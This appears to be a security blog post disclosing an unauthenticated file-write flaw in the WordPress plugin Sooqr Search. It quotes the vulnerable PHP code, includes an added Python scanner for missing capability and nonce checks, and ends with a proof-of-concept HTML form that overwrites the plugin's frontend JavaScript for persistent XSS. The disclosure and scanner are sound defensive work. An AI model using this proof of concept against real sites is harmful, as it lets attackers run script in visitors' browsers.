Our Proactive Monitoring Caught a Restricted File Upload Vulnerability in Sooqr Search
Much like what we found with the plugin Analytics-Gtag earlier this week, our proactive monitoring of changes made to WordPress plugins in the Plugin Directory to try to catch serious vulnerabilities has caught a restricted file upload vulnerability in the plugin Sooqr Search. Because it allows arbitrary content to be written to a JavaScript file that the plugin serves to visitors, the most obvious use is persistent cross-site scripting (XSS). It could also be combined with, say, a local file inclusion (LFI) vulnerability to get arbitrary code executed on the server.
The plugin registers the function sooqr_save_javascript() to run during admin_init:
$this->loader->sooqr_add_action('admin_init', $plugin_admin, 'sooqr_save_javascript');
That causes the function to run whenever a page under /wp-admin/ is loaded, which includes /wp-admin/admin-post.php and /wp-admin/admin-ajax.php, neither of which requires the requester to be logged in. That is a common starting point for vulnerabilities, including ones exploited in the wild, so any function hooked there is something we check during the security reviews we do of plugins.
When that function runs, if the POST input "snippetjs" exists, its value is written, with no capability check and no nonce check, to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js:
public function sooqr_save_javascript() {
    if (isset($_POST['snippetjs'])) {
        $file = plugin_dir_path(__DIR__) . 'public/js/sooqrsearch.js';
        $content = file_get_contents($file);
        // Request input written straight to the plugin's JavaScript file,
        // with no current_user_can() or nonce check before it.
        file_put_contents($file, stripslashes($_POST['snippetjs']));
If the plugin's functionality is enabled, that file is loaded on the frontend pages of the website, so whatever JavaScript was written to it runs in every visitor's browser.
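As an added example (not code from this post or from the plugin), here is the review check described above written as a small static scan: it finds callbacks hooked to admin_init, then flags any that pass request input to a filesystem sink without both a capability check and a nonce check. The two PHP inputs are constructed for the example; the "hardened" one is an assumed fix, not the vendor's patch. The function and regex names are the example's own.

```python
import re

# Constructed sample mirroring the vulnerable pattern described in the post
# (a minimal stand-in, not the plugin's actual source).
VULNERABLE_PLUGIN = r"""<?php
$this->loader->sooqr_add_action('admin_init', $plugin_admin, 'sooqr_save_javascript');

class Sooqr_Admin {
    public function sooqr_save_javascript() {
        if (isset($_POST['snippetjs'])) {
            $file = plugin_dir_path(__DIR__) . 'public/js/sooqrsearch.js';
            file_put_contents($file, stripslashes($_POST['snippetjs']));
        }
    }
}
"""

# Constructed hardened variant (an assumed fix, not the vendor's patch): the
# same write is gated on a capability check and a nonce check.
HARDENED_PLUGIN = r"""<?php
$this->loader->sooqr_add_action('admin_init', $plugin_admin, 'sooqr_save_javascript');

class Sooqr_Admin {
    public function sooqr_save_javascript() {
        if (!isset($_POST['snippetjs'])) {
            return;
        }
        if (!current_user_can('manage_options')) {
            return;
        }
        check_admin_referer('sooqr_save_javascript');
        $file = plugin_dir_path(__DIR__) . 'public/js/sooqrsearch.js';
        file_put_contents($file, stripslashes($_POST['snippetjs']));
    }
}
"""

# Registration of a callback on admin_init. Matches plain add_action() as well
# as wrappers such as sooqr_add_action('admin_init', $obj, 'fn'), and the
# array($this, 'fn') / [$this, 'fn'] callable forms.
HOOK_RE = re.compile(
    r"add_action\(\s*['\"]admin_init['\"]\s*,\s*"
    r"(?:array\(\s*\$\w+\s*,\s*|\[\s*\$\w+\s*,\s*|\$\w+\s*,\s*)?"
    r"['\"](\w+)['\"]"
)
# Attacker-controlled request input.
SOURCE_RE = re.compile(r"\$_(?:POST|GET|REQUEST|FILES)\b")
# Filesystem sinks worth flagging when fed by request input.
SINK_RE = re.compile(
    r"\b(file_put_contents|fwrite|fopen|move_uploaded_file|copy|rename|unlink)\s*\("
)
# Authorisation (capability) and intent (nonce) checks. is_admin() is not a
# guard: it is true on admin-post.php and admin-ajax.php for anonymous users.
CAP_RE = re.compile(r"\bcurrent_user_can\s*\(")
NONCE_RE = re.compile(r"\b(?:check_admin_referer|check_ajax_referer|wp_verify_nonce)\s*\(")


def function_body(src, name):
    """Return the brace-delimited body of PHP function `name`, or None.
    Plain brace counting: fine for sources whose string literals hold no braces."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\(", src)
    if m is None:
        return None
    start = src.find("{", m.end())
    if start < 0:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return None


def audit_admin_init(src):
    """Flag admin_init callbacks that pass request input to a file sink
    without both a capability check and a nonce check."""
    findings = []
    for name in HOOK_RE.findall(src):
        body = function_body(src, name)
        if body is None:
            continue
        sinks = sorted(set(SINK_RE.findall(body)))
        if not sinks or not SOURCE_RE.search(body):
            continue
        missing = []
        if not CAP_RE.search(body):
            missing.append("capability check")
        if not NONCE_RE.search(body):
            missing.append("nonce check")
        if missing:
            findings.append({"function": name, "sinks": sinks, "missing": missing})
    return findings


if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PLUGIN), ("hardened", HARDENED_PLUGIN)):
        print(label, audit_admin_init(src))
```

The scan reports the missing checks separately because a nonce on its own is not authorisation: it proves the request was intended by whoever holds the nonce, and a subscriber-level nonce still lets a low-privileged user write the file. A capability check without a nonce leaves the write open to CSRF against an administrator. Both are needed before the write.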
Due to the continued inappropriate behavior of the moderators of the WordPress Support Forum, we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so that these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, since a previously fully disclosed vulnerability was quickly on hackers' radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.
Proof of Concept
The following proof of concept will save the specified user input to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[file contents]” with the contents to be placed in the file.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="snippetjs" value="[file contents]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>